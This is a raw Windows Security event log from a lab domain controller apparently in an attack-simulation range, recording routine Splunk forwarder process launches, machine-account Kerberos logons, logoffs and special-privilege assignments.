TaskCategory=Process Creation
OpCode=Info
RecordNumber=264111
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x98c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264110
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xee0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:49:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264112
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aa4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:49:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264113
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x118c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:49:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264114
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1808
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:49:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264116
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:49:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264115
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19c0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:49:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264117
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B5114
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:49:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264120
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B8A3A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:49:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264119
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B8A3A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51860
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:49:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264118
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B8A3A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:50:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264122
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe88
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:50:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264121
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x5fc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:50:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264123
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x142c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:50:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264124
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1260
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:50:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264125
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a14
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:50:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264127
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:50:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264126
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a30
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:50:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264130
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7BC40D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:50:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264129
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7BC40D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51874
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:50:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264128
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7BC40D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:51:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264132
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x3c0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:51:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264131
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1064
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
